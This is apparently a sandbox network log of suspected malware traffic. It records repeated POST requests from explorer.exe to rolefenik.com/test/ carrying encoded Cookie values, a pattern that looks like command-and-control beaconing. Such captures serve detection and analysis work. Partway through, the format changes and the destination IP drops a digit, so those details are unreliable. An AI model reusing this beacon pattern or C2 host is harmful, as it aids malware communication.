Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NRsmTK4zECRTJZbRLJeJWTkBxSyjVw01SahKGcHa9o6LZwCKFxHK3WXk%2BNvuhFmJvACPf48cBsSaanMWCxKMCBRYBtQ0Ipx14rfo4sXGQWZZvzc6ebbHKBINwhujH9nH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1decdd7f24e9a9-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1283&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2239752&cwnd=251&unsent_bytes=0&cid=848785e1b458740b&ts=3014&x=0"
2024-11-13 10:02:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 58091 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:20 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1gHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:22 UTC | 783 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQNUcqeVNp32%2F7czGTTqIEk6%2FM7vTWFCZX4vXrDXix09COSyQNTTEoEvHKUwYMZJ4%2FVGEnjiTctJwHBBaDjQa6jsHXbxN5hDMZ5ouJxYVr%2BOoeYGjgvBjA0CAm7RJIuf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1decf49a9e485b-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1245&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=6a382d649e7278b1&ts=2048&x=0"
2024-11-13 10:02:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 58092 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:23 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1jHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:24 UTC | 793 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qA%2BsbJhOPtU%2B95KhJ%2Bji0zy6y%2F0xlii2Ijupzl2Z53I%2Fu%2BjPs9Sa6pgH1OFRfhO57EgkNAZ8YfWhTIR%2FQIqx5464tWJtGEQXFr4sfx%2BAva5EyVqBAtQHg0iz%2F9TbGYYr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded06796a6c6f-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2781940&cwnd=251&unsent_bytes=0&cid=d94a501b40f9f825&ts=2000&x=0"
2024-11-13 10:02:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 58093 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:25 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1iHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:27 UTC | 782 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDQiSyFx26fpPO4tKmCT%2BKF9MxYr7qBWn8bdhf6fffrpw7s85UmSiSxkLWkBJrAbF2flXSBE%2B4JAEMVWzJTVQ2QGDqSW9FgU5ZE%2FDlLnukw21lTweV06X8fGP1Re%2BZi8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded1749aee6fe-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1365&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2042313&cwnd=57&unsent_bytes=0&cid=96c8181b89276181&ts=2044&x=0"
2024-11-13 10:02:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 58094 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:28 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1tHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:30 UTC | 781 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XwfD%2Bs1C64DiNStTKRstp0GWmUlnJS1Lxf2RGkDsJyVXoRz595KK9s7LC25OVqYd5ndjsK%2FfPds9OQ0zVy8wl6LMV9vKWNVyeFfiuYQfl66w8%2FjKgz6BNPR3pQEyqAe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded2859ca4686-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2487972&cwnd=251&unsent_bytes=0&cid=1d40b5195cb4b183&ts=2114&x=0"
2024-11-13 10:02:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 58095 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:31 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1sHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:33 UTC | 781 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BScuoTYXAHnYeyz1HknKvaUXmjKiG1Ajilq9VQXXpxfstkq%2B3lSuXaBxCXAEcgC%2FBmuy8w0uYiKjNJvNjXlPTPYB1DIip8aiOduNsfa8Mwkux9wCmmG34Dc7d8v2CME"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded39bf106c3a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2627949&cwnd=251&unsent_bytes=0&cid=50a744fef820d350&ts=2016&x=0"
2024-11-13 10:02:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 58096 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:33 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:35 UTC | 779 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A5nH3amZnMJcA%2Ft4R7c2mg7DuDB7PvG%2B5n5dLwvYxEGany0WbwDhuJLSplg14tXmXMbYikSUpNalFFNip9eATW3U0ZxuW46MFzg2jT4n03V7gVtY8HH9KhtPTf0MTBcy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded4acc8f2cdc-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=1894048&cwnd=251&unsent_bytes=0&cid=a721143587b1973e&ts=1950&x=0"
2024-11-13 10:02:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 58097 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:36 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:38 UTC | 791 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z8iHmXR59w%2FlmfaCilGUidk5OPi3Mn%2BKs%2Fb55%2FpOV0E9GlvbgwKq6iFB0NbF7T1EzSwC23N8aeN%2F8jXqhnyTAHiRPvJCLSc2iFRfk1nOh%2BGPKC%2BVP%2BFC672ZD2G07cLM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded5b4a7f46cb-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1741431&cwnd=251&unsent_bytes=0&cid=fc3548cc8710f291&ts=1835&x=0"
2024-11-13 10:02:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 58098 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:39 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:41 UTC | 783 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3eemjTtERrfRkqh%2BBfqNnR44Vfe9SediEL8CHo7aJo3DLt%2BmCwlvBqvYOlNwK8prXqd0ICrgWixrNWyidj2GVodKUwn8uZ4AwFVBjqtjazAdDKr%2BD%2B1oEGmJA4EOPTE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded6b08c2469e-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1033&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2693953&cwnd=251&unsent_bytes=0&cid=7e7ce1e5175ba1fb&ts=2549&x=0"
2024-11-13 10:02:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 58100 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:42 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:44 UTC | 779 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YaOWI46aqhtA329hOafabtmesEDrfJahkYcq0A2Zq6BZYCJMNzbNA4UBoIYMPjrZrvX2rZELoRV2WzUsrlSrVT4Za7wqcfRh4e1%2Fu1X%2BrGWq4kbFONUkCwizkKsRsvOR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded7f3c5eeae9-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2095513&cwnd=242&unsent_bytes=0&cid=6f8dff0d09c5224e&ts=2047&x=0"
2024-11-13 10:02:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session 14: 192.168.2.8:58101 -> 172.67.191.23:443, PID 4084, C:\Windows\explorer.exe

2024-11-13 10:02:45 UTC  OUT  414 bytes
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache

2024-11-13 10:02:47 UTC  IN  783 bytes
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5WafbEljz3Ww1u5a7NF5tNBXgsPJH%2FbeOXCDV1pcA4zPp1nNwtc8D%2BqsFTeK%2F%2ByZE69KWIc6HqAYO5ZttbJNvzVK0z5al0Gj2U5cxBN0toPL9QB1q33diAEgHGKDeHl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1ded90ebf1e946-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2192278&cwnd=251&unsent_bytes=0&cid=dab77eba5d96a2fe&ts=2036&x=0"

2024-11-13 10:02:47 UTC  IN  5 bytes
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session 15: 192.168.2.8:58102 -> 172.67.191.23:443, PID 4084, C:\Windows\explorer.exe

2024-11-13 10:02:47 UTC  OUT  414 bytes
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache

2024-11-13 10:02:49 UTC  IN  785 bytes
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSu2ecLUuEYPHT7tNfYYYlLCHniSszTjF05ho6p7r7sn%2FGgyE5hBMwf2Q0jWOWJPL8ZFcLs%2BOX8HJbDeGrGIHET%2BWVW5n0et%2B0VZ7BZgoa2NkZ2r%2FX4S6CUCharYlu7n"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1deda16b94463b-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=2696461&cwnd=241&unsent_bytes=0&cid=082789492961d297&ts=1992&x=0"

2024-11-13 10:02:49 UTC  IN  5 bytes
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session 16: 192.168.2.8:58103 -> 172.67.191.23:443, PID 4084, C:\Windows\explorer.exe

2024-11-13 10:02:50 UTC  OUT  414 bytes
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache

2024-11-13 10:02:52 UTC  IN  781 bytes
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=882NnKdDPdv21p3fzjHnt5NRkjokr0XhTYN2MLZ4pIzVMHqTOPpwE4uxVBLVttvQw9%2FbVDVfBZIFRjPrURHU%2FlSs1iDUaOcTpA2fMaDtEedPBwmhTBdQB52rR8HSeVj%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dedb21b57475b-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1824&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1576483&cwnd=251&unsent_bytes=0&cid=d211a079c1c66077&ts=2122&x=0"

2024-11-13 10:02:52 UTC  IN  5 bytes
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session 17: 192.168.2.8:58104 -> 172.67.191.23:443, PID 4084, C:\Windows\explorer.exe

2024-11-13 10:02:53 UTC  OUT  414 bytes
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kDKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache

2024-11-13 10:02:55 UTC  IN  783 bytes
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqjpyTOpfOS8eNQVSPSmCuVP2L4vQfcd5qc3VU%2B4ShRjc0zJUstkIIxhLMoBCH4to7LvcWkUNTkoJlpbG%2B3rLxs0r7Hc81nly34HhyIoi1vQcF%2FcOgJQKCMZVeb%2BRIw1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dedc4393947a6-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1384983&cwnd=242&unsent_bytes=0&cid=40b8d6c7606dba96&ts=1829&x=0"

2024-11-13 10:02:55 UTC  IN  5 bytes
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session 18: 192.168.2.8:58105 -> 172.67.191.23:443, PID 4084, C:\Windows\explorer.exe

2024-11-13 10:02:56 UTC  OUT  414 bytes
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kA6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache

2024-11-13 10:02:58 UTC  IN  779 bytes
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPIOval8S5pLOxJGljhXDoOqOntAlbDXOeqRbqQ9z5lbwabe8gEfHKdwdk4whJhTIYE%2BWYshb7CIPINY5jw%2BCrd8jzXpyOnDNgdBj7GWbEL3iii5mJ6BPYa7XzBUYK17"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dedd6ae936be4-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1063&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2604316&cwnd=251&unsent_bytes=0&cid=9a0154bfd19c016f&ts=2033&x=0"

2024-11-13 10:02:58 UTC  IN  5 bytes
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session 19: 192.168.2.8:58106 -> 172.67.191.23:443, PID 4084, C:\Windows\explorer.exe

2024-11-13 10:02:59 UTC  OUT  414 bytes
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kAqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache

2024-11-13 10:03:01 UTC  IN  783 bytes
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:03:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
